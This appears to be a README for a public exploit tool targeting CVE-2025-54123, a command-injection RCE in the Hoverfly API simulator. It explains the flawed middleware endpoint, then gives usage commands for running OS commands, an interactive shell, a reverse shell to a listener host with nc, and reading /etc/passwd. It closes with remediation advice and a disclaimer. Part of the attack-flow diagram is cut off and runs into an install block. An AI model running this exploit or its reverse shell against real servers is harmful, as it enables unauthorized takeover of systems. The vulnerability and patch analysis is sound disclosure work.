Share
## https://sploitus.com/exploit?id=F353302B-87A7-5F01-A538-3E5379B2E7FC
# CVE-2025-54123 โ€” Hoverfly Middleware API Remote Code Execution

> **Authenticated RCE via OS Command Injection in Hoverfly โ‰ค 1.11.3**

## Vulnerability Overview

| Property        | Value                                                                 |
|-----------------|-----------------------------------------------------------------------|
| **CVE ID**      | [CVE-2025-54123](https://nvd.nist.gov/vuln/detail/CVE-2025-54123)     |
| **CVSS Score**  | **9.8 โ€” Critical**                                                    |
| **CVSS Vector** | `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`                     |
| **CWE**         | CWE-78 (OS Command Injection), CWE-20 (Improper Input Validation)     |
| **Product**     | [Hoverfly](https://github.com/SpectoLabs/hoverfly) โ€” Open-source API simulation tool |
| **Affected**    | All versions up to and including **1.11.3**                           |
| **Fixed In**    | **1.12.0** ([patch commit](https://github.com/SpectoLabs/hoverfly/commit/17e60a9bc78826deb4b782dca1c1abd3dbe60d40)) |
| **Advisory**    | [GHSA-r4h8-hfp2-ggmf](https://github.com/SpectoLabs/hoverfly/security/advisories/GHSA-r4h8-hfp2-ggmf) |

---

## Technical Analysis

Here's Case Study deep dive and technical analysis as white box and black box prespective
https://medium.com/@phantom_hat/cve-2025-54123-hoverfly-1-11-3-command-injection-rce-case-study-patch-diffing-aacc092f7f3a

### Attack Surface

Hoverfly exposes a RESTful admin API (default port `8888`) for managing simulation configurations. The middleware management endpoint at **`/api/v2/hoverfly/middleware`** accepts a JSON body with `binary` and `script` fields that define an external middleware process.

### Root Cause

The vulnerability is born from a combination of **three code-level flaws**:

1. **Insufficient Input Validation** โ€” [`middleware.go:93-96`](https://github.com/SpectoLabs/hoverfly/blob/master/core/middleware/middleware.go#L93): The `SetBinary()` function accepts the `binary` parameter without any validation or sanitisation, allowing an attacker to specify arbitrary executables (e.g., `bash`).

2. **Unsafe Command Execution** โ€” [`local_middleware.go:14-19`](https://github.com/SpectoLabs/hoverfly/blob/master/core/middleware/local_middleware.go#L13): The middleware is executed via `exec.Command()` with the attacker-controlled `binary` and `script` values passed directly as arguments, enabling OS command injection.

3. **Immediate Execution During Testing** โ€” [`hoverfly_service.go:173`](https://github.com/SpectoLabs/hoverfly/blob/master/core/hoverfly_service.go#L173): When the middleware is set via the API, Hoverfly immediately tests the middleware by executing it, triggering the injected command at configuration time rather than at proxy-intercept time.

### Attack Flow

```
Attacker                              Hoverfly (โ‰ค 1.11.3)
   โ”‚                                        โ”‚
   โ”‚โ”€โ”€โ”€ POST /api/token-auth โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€>โ”‚  (1) Authenticate
   โ”‚โ”‚  (2) Inject payload
   โ”‚    { "binary": "bash",                 โ”‚
   โ”‚      "script": "" }     โ”‚
   โ”‚                                        โ”‚
   โ”‚    โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”โ”‚
   โ”‚    โ”‚ exec.Command("bash", tmpScript)  โ”‚โ”‚  (3) Immediate execution
   โ”‚    โ”‚ โ†’ attacker command runs as       โ”‚โ”‚
   โ”‚    โ”‚   the Hoverfly process user      โ”‚โ”‚
   โ”‚    โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜โ”‚
   โ”‚                                        โ”‚
   โ”‚/CVE-2025-54123.git
cd CVE-2025-54123
pip install -r requirements.txt
```

### Modes of Operation

#### Check-Only Mode
Verify target reachability and authentication without exploitation:
```bash
python3 exploit.py -u http://target:8888 -U admin -P  -C
```

#### Single Command Execution
Execute a single OS command on the target:
```bash
python3 exploit.py -u http://target:8888 -U admin -P  -c 'id'
```

#### Interactive Pseudo-Shell
Drop into a persistent shell session:
```bash
python3 exploit.py -u http://target:8888 -U admin -P  -i
```

#### Reverse Shell
Send a reverse shell to your listener:
```bash
# Terminal 1 โ€” start listener
nc -lvnp 4444

# Terminal 2 โ€” launch exploit
python3 exploit.py -u http://target:8888 -U admin -P  --revshell 10.0.0.1:4444
```

#### Verbose Mode with Proxy
Route traffic through Burp Suite for inspection:
```bash
python3 exploit.py -u http://target:8888 -U admin -P  -c 'cat /etc/passwd' --proxy -v
```

### Full Flag Reference

| Flag                | Description                              | Default   |
|---------------------|------------------------------------------|-----------|
| `-u`, `--url`       | Target Hoverfly URL                      | Required  |
| `-U`, `--username`  | Admin username                           | Required  |
| `-P`, `--password`  | Admin password                           | Required  |
| `-c`, `--command`   | OS command to execute                    | โ€”         |
| `-C`, `--check`     | Check-only mode (no exploitation)        | `false`   |
| `-i`, `--interactive` | Interactive pseudo-shell               | `false`   |
| `--revshell`        | Reverse shell `LHOST:LPORT`              | โ€”         |
| `--proxy`           | Route through `127.0.0.1:8080`           | `false`   |
| `--timeout`         | Request timeout (seconds)                | `15`      |
| `-v`, `--verbose`   | Enable verbose output                    | `false`   |

---

## Remediation

| Action | Details |
|--------|---------|
| **Upgrade** | Update Hoverfly to **v1.12.0** or later, where the set middleware API is disabled by default |
| **Network Segmentation** | Restrict access to the Hoverfly admin API (port `8888`) to trusted networks only |
| **Authentication** | Use strong, unique passwords for the Hoverfly admin API |
| **Monitoring** | Monitor for unexpected `PUT` requests to `/api/v2/hoverfly/middleware` |

### Patch Details

The fix in [commit `17e60a9`](https://github.com/SpectoLabs/hoverfly/commit/17e60a9bc78826deb4b782dca1c1abd3dbe60d40) disables the set middleware API by default. Subsequent changes to documentation ([commit `a9d4da7`](https://github.com/SpectoLabs/hoverfly/commit/a9d4da7bd7269651f54542ab790d0c613d568d3e)) make users aware of the security implications of exposing this endpoint.

---

## References

- [NVD โ€” CVE-2025-54123](https://nvd.nist.gov/vuln/detail/CVE-2025-54123)
- [GitHub Security Advisory โ€” GHSA-r4h8-hfp2-ggmf](https://github.com/SpectoLabs/hoverfly/security/advisories/GHSA-r4h8-hfp2-ggmf)
- [Vulnerable Code โ€” hoverfly_service.go#L173](https://github.com/SpectoLabs/hoverfly/blob/master/core/hoverfly_service.go#L173)
- [Vulnerable Code โ€” middleware.go#L93](https://github.com/SpectoLabs/hoverfly/blob/master/core/middleware/middleware.go#L93)
- [Vulnerable Code โ€” local_middleware.go#L13](https://github.com/SpectoLabs/hoverfly/blob/master/core/middleware/local_middleware.go#L13)
- [Patch Commit โ€” 17e60a9](https://github.com/SpectoLabs/hoverfly/commit/17e60a9bc78826deb4b782dca1c1abd3dbe60d40)

---

## Disclaimer

> **This tool is provided for authorized security testing and educational research purposes only.**
> Unauthorized access to computer systems is illegal under the Computer Fraud and Abuse Act (CFAA)
> and equivalent laws worldwide. The author assumes no liability for misuse of this software.
> Always obtain explicit written permission before testing any system you do not own.

---

## Project Structure

```
CVE-2025-54123/
โ”œโ”€โ”€ Exploit/
โ”‚   โ”œโ”€โ”€ exploit.py          # Polished exploit
โ”‚   โ””โ”€โ”€ raw_exploit.py      # Original raw PoC
โ”œโ”€โ”€ Images/                 # Research screenshots
โ”œโ”€โ”€ Reference/              # Reference exploits for study
โ”œโ”€โ”€ requirements.txt        # Python dependencies
โ””โ”€โ”€ README.md               # This file
```

---

## Author

**Phantom Hat** โ€” Security Researcher

---

*This research was conducted as part of a vulnerability case study for educational purposes.*